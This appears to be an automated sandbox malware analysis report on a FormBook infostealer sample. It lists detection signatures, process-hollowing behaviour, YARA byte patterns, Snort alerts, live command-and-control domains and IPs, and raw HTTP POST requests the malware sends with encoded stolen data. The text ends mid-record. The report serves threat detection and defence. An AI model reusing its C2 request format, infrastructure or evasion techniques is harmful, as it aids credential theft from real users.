Windows Analysis Report
zeuhAxTIRX.exe

Overview

General Information

Sample Name: zeuhAxTIRX.exe
Analysis ID: 799425
MD5: 271ae718b77b74826bb47fa7495eb565
SHA1: 45c8612d99bc2d05fb9cf42c1d84631c8e68b479
SHA256: c0fd42b42f88ead8da8a49c472155197542576a4804fb270118292dfc5d40b77
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • zeuhAxTIRX.exe (PID: 1236 cmdline: C:\Users\user\Desktop\zeuhAxTIRX.exe MD5: 271AE718B77B74826BB47FA7495EB565)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autoconv.exe (PID: 5092 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • rundll32.exe (PID: 5240 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x1f080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de27:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x1f080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0.2.zeuhAxTIRX.exe.e50000.1.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        0.2.zeuhAxTIRX.exe.e50000.1.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x20053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe12:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x192ca:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        0.2.zeuhAxTIRX.exe.e50000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x190c8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b64:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x191ca:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19342:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9dd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17daf:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1edfa:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fdad:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        No Sigma rule has matched
        Timestamp: 02/06/23-14:39:32.673954
        Source IP: 192.168.2.4
        Destination IP: 199.59.243.222
        SID: 2031453
        Source Port: 49711
        Destination Port: 80
        Protocol: TCP
        Classtype: A Network Trojan was detected
        Timestamp: 02/06/23-14:39:32.673954
        Source IP: 192.168.2.4
        Destination IP: 199.59.243.222
        SID: 2031449
        Source Port: 49711
        Destination Port: 80
        Protocol: TCP
        Classtype: A Network Trojan was detected
        Timestamp: 02/06/23-14:39:32.673954
        Source IP: 192.168.2.4
        Destination IP: 199.59.243.222
        SID: 2031412
        Source Port: 49711
        Destination Port: 80
        Protocol: TCP
        Classtype: A Network Trojan was detected

        AV Detection

        Source: zeuhAxTIRX.exe | ReversingLabs: Detection: 56%
        Source: zeuhAxTIRX.exe | Virustotal: Detection: 54%
        Source: Yara match | File source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: zeuhAxTIRX.exe | Avira: detected
        Source: zeuhAxTIRX.exe | Joe Sandbox ML: detected
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 0.0.zeuhAxTIRX.exe.e50000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
        Source: zeuhAxTIRX.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: zeuhAxTIRX.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.578096902.0000000004242000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.575803358.00000000040AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.578096902.0000000004242000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.575803358.00000000040AA000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_02A63200 FindFirstFileW,FindNextFileW,FindClose, 8_2_02A63200
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_02A631FA FindFirstFileW,FindNextFileW,FindClose, 8_2_02A631FA
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop edi, 8_2_02A58D80
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop edi, 8_2_02A58D6F
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop edi, 8_2_02A58D7F

        Networking

        Source: C:\Windows\explorer.exe | Network Connect: 63.141.242.45 80
        Source: C:\Windows\explorer.exe | Network Connect: 172.67.156.58 80
        Source: C:\Windows\explorer.exe | Network Connect: 87.236.16.107 80
        Source: C:\Windows\explorer.exe | Domain query: www.ontheverge.wales
        Source: C:\Windows\explorer.exe | Domain query: www.lastmilerent.com
        Source: C:\Windows\explorer.exe | Domain query: www.moneycarrewards.com
        Source: C:\Windows\explorer.exe | Network Connect: 199.192.28.121 80
        Source: C:\Windows\explorer.exe | Domain query: www.dezella.xyz
        Source: C:\Windows\explorer.exe | Network Connect: 185.215.4.36 80
        Source: C:\Windows\explorer.exe | Network Connect: 132.148.233.235 80
        Source: C:\Windows\explorer.exe | Domain query: www.utmedicined.com
        Source: C:\Windows\explorer.exe | Domain query: www.gmbuxie.net
        Source: C:\Windows\explorer.exe | Network Connect: 217.76.156.252 80
        Source: C:\Windows\explorer.exe | Domain query: www.cmproutdoors.com
        Source: C:\Windows\explorer.exe | Network Connect: 156.255.170.114 80
        Source: C:\Windows\explorer.exe | Domain query: www.0w3jy.com
        Source: C:\Windows\explorer.exe | Domain query: www.frogair.online
        Source: C:\Windows\explorer.exe | Domain query: www.fildoor.store
        Source: C:\Windows\explorer.exe | Network Connect: 199.59.243.222 80
        Source: C:\Windows\explorer.exe | Domain query: www.parkhomenko-zinaida.ru
        Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.72 80
        Source: C:\Windows\explorer.exe | Domain query: www.b-yy.xyz
        Source: C:\Windows\explorer.exe | Network Connect: 164.88.122.250 80
        Source: C:\Windows\explorer.exe | Network Connect: 154.205.192.37 80
        Source: C:\Windows\explorer.exe | Network Connect: 3.127.73.216 80
        Source: C:\Windows\explorer.exe | Domain query: www.staciesellslka.com
        Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49711 -> 199.59.243.222:80
        Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49711 -> 199.59.243.222:80
        Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49711 -> 199.59.243.222:80
        Source: C:\Windows\explorer.exe | DNS query: www.b-yy.xyz
        Source: C:\Windows\explorer.exe | DNS query: www.dezella.xyz
        Source: Joe Sandbox View | ASN Name: NOCIXUS
        Source: Joe Sandbox View | IP Address: 63.141.242.45
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.b-yy.xyzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.b-yy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.b-yy.xyz/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 76 73 58 6e 28 6d 71 75 28 4b 67 77 68 2d 39 47 63 2d 4f 66 32 44 4f 7a 75 6e 69 66 4b 4c 28 36 77 72 56 4e 59 71 65 43 63 44 6a 57 68 62 77 32 59 34 34 7a 47 36 63 41 67 7a 70 65 79 47 4e 47 67 58 5a 6f 78 66 67 32 34 53 64 70 68 4a 62 48 65 5a 38 34 53 4b 4e 74 63 36 69 6d 59 45 34 35 75 39 49 4a 7a 78 5a 4d 55 36 68 75 75 70 6f 48 4a 6f 68 59 75 66 4b 77 72 63 48 65 50 6b 64 6c 4c 4b 67 33 50 66 72 56 54 47 39 39 4b 77 78 76 36 34 5a 43 43 6a 36 56 4c 53 74 75 32 50 34 31 33 43 61 6b 68 37 57 69 77 43 38 6e 4f 57 6d 5f 4b 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=vsXn(mqu(Kgwh-9Gc-Of2DOzunifKL(6wrVNYqeCcDjWhbw2Y44zG6cAgzpeyGNGgXZoxfg24SdphJbHeZ84SKNtc6imYE45u9IJzxZMU6huupoHJohYufKwrcHePkdlLKg3PfrVTG99Kwxv64ZCCj6VLStu2P413Cakh7WiwC8nOWm_Kw).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.fildoor.storeConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.fildoor.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fildoor.store/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 78 74 41 6c 42 72 30 70 50 71 31 39 58 4a 31 62 7e 42 63 30 32 51 37 41 31 45 4b 64 35 6f 61 62 7e 63 6b 79 37 65 64 76 62 6f 70 76 77 77 62 63 5a 50 35 49 51 63 64 35 6b 68 71 52 79 57 32 70 61 78 77 45 4a 2d 4d 61 44 78 52 6f 6b 74 4b 48 76 41 35 39 55 38 55 56 47 38 55 5f 35 68 5a 78 69 77 48 41 6e 54 31 68 53 6a 69 42 50 51 4f 44 74 4c 6d 75 6c 34 32 5f 37 4f 4c 51 49 49 49 78 31 59 37 51 38 56 72 76 41 56 73 72 6b 41 74 69 7a 46 6b 50 32 75 75 6f 38 4e 7e 59 55 71 6c 4b 77 51 4f 79 72 69 57 57 55 2d 62 62 36 7a 61 79 6f 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=xtAlBr0pPq19XJ1b~Bc02Q7A1EKd5oab~cky7edvbopvwwbcZP5IQcd5khqRyW2paxwEJ-MaDxRoktKHvA59U8UVG8U_5hZxiwHAnT1hSjiBPQODtLmul42_7OLQIIIx1Y7Q8VrvAVsrkAtizFkP2uuo8N~YUqlKwQOyriWWU-bb6zayog).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.parkhomenko-zinaida.ruConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.parkhomenko-zinaida.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.parkhomenko-zinaida.ru/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 4c 69 75 35 28 68 47 54 35 63 58 54 6f 30 63 65 31 4d 32 69 44 39 59 6e 41 59 71 52 74 35 56 74 4c 52 72 62 4a 35 47 7a 4b 6c 6d 72 61 4e 64 70 39 77 71 4c 71 45 28 44 56 30 39 69 77 72 73 5f 42 2d 74 55 48 59 47 50 52 79 77 47 65 6d 35 48 72 77 70 6f 38 4c 34 42 64 77 78 36 71 56 54 77 45 66 47 79 43 61 74 64 75 53 70 6d 6d 42 6b 75 54 48 46 71 49 64 75 57 5a 34 69 4b 36 7a 52 4b 77 4d 5a 6b 4c 63 44 78 6d 31 51 68 78 30 73 2d 6a 48 35 56 51 36 7e 39 5a 49 31 6c 48 43 76 56 4c 64 49 4d 51 58 58 31 53 55 41 57 66 59 76 4e 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=Liu5(hGT5cXTo0ce1M2iD9YnAYqRt5VtLRrbJ5GzKlmraNdp9wqLqE(DV09iwrs_B-tUHYGPRywGem5Hrwpo8L4Bdwx6qVTwEfGyCatduSpmmBkuTHFqIduWZ4iK6zRKwMZkLcDxm1Qhx0s-jH5VQ6~9ZI1lHCvVLdIMQXX1SUAWfYvNyw).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.dezella.xyzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dezella.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dezella.xyz/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 39 5a 6e 48 63 48 41 46 59 6d 4d 70 55 58 62 31 78 49 62 4e 69 41 75 4d 47 6a 50 36 46 54 44 31 51 42 33 42 7a 53 39 52 55 6a 71 58 47 4d 6b 47 71 4d 77 33 44 52 44 65 4f 79 47 65 59 76 6b 53 6f 32 6e 47 79 5a 76 69 56 64 73 41 71 59 69 48 30 47 48 67 4c 56 75 31 49 43 6c 6e 58 33 39 56 71 6f 79 63 37 6a 30 47 71 33 38 56 7a 42 74 4d 56 61 6c 31 59 30 41 38 78 33 6e 62 34 63 70 55 6b 75 63 2d 56 70 6e 54 53 50 57 78 55 51 72 5f 5a 44 39 79 52 54 4d 6d 68 54 39 68 5a 49 4d 64 64 2d 37 77 73 56 44 55 70 71 30 50 38 6d 50 69 4d 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=9ZnHcHAFYmMpUXb1xIbNiAuMGjP6FTD1QB3BzS9RUjqXGMkGqMw3DRDeOyGeYvkSo2nGyZviVdsAqYiH0GHgLVu1IClnX39Vqoyc7j0Gq38VzBtMVal1Y0A8x3nb4cpUkuc-VpnTSPWxUQr_ZD9yRTMmhT9hZIMdd-7wsVDUpq0P8mPiMg).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.staciesellslka.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.staciesellslka.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.staciesellslka.com/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 76 64 41 45 79 6a 55 51 47 39 64 69 61 71 4d 6a 33 7a 41 62 67 6b 41 37 4b 32 70 55 69 58 41 4a 67 6f 6c 4c 61 36 28 45 79 4c 74 70 4f 55 43 36 35 5a 4e 71 65 66 59 2d 61 2d 4a 4e 66 45 55 55 50 4e 78 59 41 4b 59 4f 59 47 6d 69 42 49 56 43 53 35 73 66 75 45 34 58 57 6d 72 4c 62 48 4a 65 42 4a 74 52 56 4f 38 52 6b 2d 32 66 65 7a 49 31 33 51 6e 71 7a 45 68 64 31 47 51 63 73 43 74 47 75 37 78 36 4e 77 58 49 48 79 7e 58 49 72 4c 46 55 49 59 54 33 4a 62 55 52 46 79 6e 76 46 41 6e 74 43 49 6c 68 72 59 32 53 36 62 78 62 38 64 5a 4b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=vdAEyjUQG9diaqMj3zAbgkA7K2pUiXAJgolLa6(EyLtpOUC65ZNqefY-a-JNfEUUPNxYAKYOYGmiBIVCS5sfuE4XWmrLbHJeBJtRVO8Rk-2fezI13QnqzEhd1GQcsCtGu7x6NwXIHy~XIrLFUIYT3JbURFynvFAntCIlhrY2S6bxb8dZKQ).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.gmbuxie.netConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.gmbuxie.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gmbuxie.net/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 53 6c 5a 66 38 75 47 65 46 67 46 64 74 52 34 50 64 30 47 4a 6d 72 54 56 4d 55 4b 70 7e 6c 31 64 35 58 56 33 36 36 53 39 78 48 4f 4f 33 6f 74 70 46 57 41 2d 4d 78 54 6f 28 5a 61 2d 64 64 79 63 69 57 4b 47 47 2d 4f 4d 72 4e 52 38 66 75 56 69 6e 78 41 73 6c 33 4e 52 35 61 5a 52 32 46 53 71 77 59 58 52 7e 4a 38 7a 43 33 50 4b 53 4b 45 37 7a 7a 74 6c 50 50 56 63 73 45 31 69 7e 74 6f 5f 50 62 7e 39 41 31 34 54 4d 4a 4a 53 4d 63 6b 33 41 58 6d 32 51 48 6e 53 33 38 65 41 48 51 30 4e 6d 44 75 7a 28 67 49 6e 4f 43 77 2d 69 6d 41 72 7e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=SlZf8uGeFgFdtR4Pd0GJmrTVMUKp~l1d5XV366S9xHOO3otpFWA-MxTo(Za-ddyciWKGG-OMrNR8fuVinxAsl3NR5aZR2FSqwYXR~J8zC3PKSKE7zztlPPVcsE1i~to_Pb~9A14TMJJSMck3AXm2QHnS38eAHQ0NmDuz(gInOCw-imAr~A).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.lastmilerent.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.lastmilerent.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lastmilerent.com/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 56 2d 55 78 61 52 7a 78 68 5f 50 45 28 65 28 63 31 58 43 50 79 64 58 4a 73 6c 31 65 67 53 6c 56 71 61 68 37 38 67 73 6d 33 7a 74 30 44 4f 76 42 59 72 58 51 4a 30 4e 32 6f 66 51 45 66 48 4d 45 73 66 67 54 70 67 4f 62 46 6e 6b 37 33 68 5a 48 51 6c 73 48 4f 51 6a 75 71 68 39 33 38 37 59 61 64 69 79 57 32 47 6f 48 4b 4e 56 79 78 53 38 59 31 38 75 67 5a 6f 73 47 31 77 79 49 6a 38 42 53 41 69 68 6c 50 47 56 61 28 62 55 64 41 33 34 4f 33 42 6d 36 54 73 64 6c 63 42 7a 5f 45 63 54 56 67 69 63 47 42 6d 56 35 59 5f 77 4f 32 2d 4c 66 68 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=V-UxaRzxh_PE(e(c1XCPydXJsl1egSlVqah78gsm3zt0DOvBYrXQJ0N2ofQEfHMEsfgTpgObFnk73hZHQlsHOQjuqh9387YadiyW2GoHKNVyxS8Y18ugZosG1wyIj8BSAihlPGVa(bUdA34O3Bm6TsdlcBz_EcTVgicGBmV5Y_wO2-LfhQ).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.moneycarrewards.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.moneycarrewards.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.moneycarrewards.com/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 68 76 50 41 55 56 77 39 4c 73 46 33 74 46 6a 45 55 55 43 68 73 72 4a 54 77 36 4c 71 48 58 72 65 6e 58 30 76 49 32 41 7a 39 49 78 64 75 6b 35 70 4b 6d 7e 31 42 44 78 58 75 54 66 55 68 4d 37 6a 69 61 30 39 77 62 78 6a 37 2d 4b 49 4c 63 48 78 68 33 33 65 36 71 51 63 36 6a 6e 6d 41 58 68 46 47 6d 43 53 4e 78 79 7a 36 79 41 4f 61 39 4b 37 59 46 32 65 68 52 6b 4d 37 50 34 6e 63 66 66 6c 4d 62 37 36 75 30 43 78 78 46 6f 34 43 69 64 52 62 49 6b 37 6f 51 51 6c 55 49 31 68 63 35 61 74 68 6f 51 4f 53 39 6a 76 66 79 43 6f 51 54 74 4b 6d 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=hvPAUVw9LsF3tFjEUUChsrJTw6LqHXrenX0vI2Az9Ixduk5pKm~1BDxXuTfUhM7jia09wbxj7-KILcHxh33e6qQc6jnmAXhFGmCSNxyz6yAOa9K7YF2ehRkM7P4ncfflMb76u0CxxFo4CidRbIk7oQQlUI1hc5athoQOS9jvfyCoQTtKmw).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.cmproutdoors.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.cmproutdoors.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cmproutdoors.com/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 4b 66 49 56 64 6b 72 77 42 4c 31 49 68 65 35 49 66 51 79 50 48 5a 49 70 76 55 37 49 71 64 44 63 4c 55 65 51 49 6f 47 5f 68 67 4a 33 6d 4d 4c 2d 62 35 75 76 6b 43 78 74 7a 74 69 74 46 72 74 78 50 37 4a 4c 4c 37 32 79 4a 4d 62 42 33 2d 65 43 69 6a 49 55 70 53 5a 57 38 6e 59 50 45 79 75 39 64 45 54 6d 52 35 57 6d 28 30 53 64 47 50 59 34 63 38 37 66 5a 66 51 6f 6a 35 36 4b 36 64 57 51 66 61 33 34 49 39 35 6f 47 52 71 48 75 68 6c 48 54 5a 41 59 33 68 7e 46 64 4a 79 72 33 53 71 38 75 37 66 41 39 48 72 6c 6c 58 63 69 33 79 57 4b 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=KfIVdkrwBL1Ihe5IfQyPHZIpvU7IqdDcLUeQIoG_hgJ3mML-b5uvkCxtztitFrtxP7JLL72yJMbB3-eCijIUpSZW8nYPEyu9dETmR5Wm(0SdGPY4c87fZfQoj56K6dWQfa34I95oGRqHuhlHTZAY3h~FdJyr3Sq8u7fA9HrllXci3yWKlg).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.ontheverge.walesConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.ontheverge.walesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontheverge.wales/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 49 64 6d 39 75 39 39 6c 67 59 28 6d 66 51 57 5f 57 77 33 2d 76 33 36 6c 35 70 79 2d 55 62 65 49 48 4e 75 51 6d 78 50 6d 4d 74 4a 79 78 51 55 32 78 4c 4c 4f 7e 67 5a 62 33 30 61 36 50 42 64 70 70 33 68 2d 65 52 72 66 79 64 75 66 6f 6c 48 70 54 65 38 76 74 44 77 5f 48 7a 37 78 46 46 76 79 61 36 52 54 58 41 38 4d 7a 75 44 41 4a 75 55 43 32 34 6b 70 73 47 4e 51 28 74 74 73 48 33 50 5f 50 38 70 65 35 6d 58 4a 64 76 50 4d 30 42 52 42 4f 6f 61 4d 78 79 38 78 5a 61 47 77 52 33 68 30 64 41 4b 69 36 61 4f 31 64 38 51 4b 47 47 4d 2d 78 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 